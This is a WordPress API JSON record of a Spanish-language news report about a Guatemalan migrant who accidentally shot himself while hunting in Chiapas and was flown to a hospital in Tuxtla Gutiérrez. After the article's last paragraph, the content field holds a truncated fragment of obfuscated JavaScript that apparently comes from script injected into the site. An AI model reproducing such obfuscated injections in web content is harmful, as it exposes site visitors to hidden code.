{"id":19166,"date":"2024-12-04T03:21:03","date_gmt":"2024-12-04T03:21:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19166"},"modified":"2024-12-04T03:21:05","modified_gmt":"2024-12-04T03:21:05","slug":"migrante-se-dispara-por-accidente","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19166","title":{"rendered":"Migrante se dispara por accidente"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733282320105-1024x576.jpg\" alt=\"\" class=\"wp-image-19167\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733282320105-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733282320105-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733282320105-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1733282320105.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 3 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes, un migrante que presentaba un disparo de arma de fuego fue atendido en un hospital particular en la capital chiapaneca.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el sujeto de origen guatemalteco de nombre Eliezer de 22 a\u00f1os ingres\u00f3 al hospital Arboledas ubicado en la 16 Poniente y 4a Norte.<\/p>\n\n\n\n<p>Dentro de los datos recabados por las fuerzas del orden el sujeto se encontraba cazando en el municipio de \u00c1ngel Albino Corzo y por accidente se dispar\u00f3 en el brazo izquierdo.<\/p>\n\n\n\n<p>El migrante fue trasladado a la capital chiapaneca en un helicoptero y en una ambulancia fue llevado al nosocomio.<\/p>\n\n\n\n<p>Los peritos de la Fiscal\u00eda General del Estado arribaron al lugar para recabar datos de lo sucedido.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 3 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este martes, un migrante que presentaba un disparo de arma de fuego fue atendido en un hospital particular en la capital chiapaneca. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el sujeto de origen guatemalteco de nombre Eliezer de 22 a\u00f1os &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19167,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19166","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19166"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19166\/revisions"}],"predecessor-version":[{"id":19168,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19166\/revisions\/19168"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19167"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}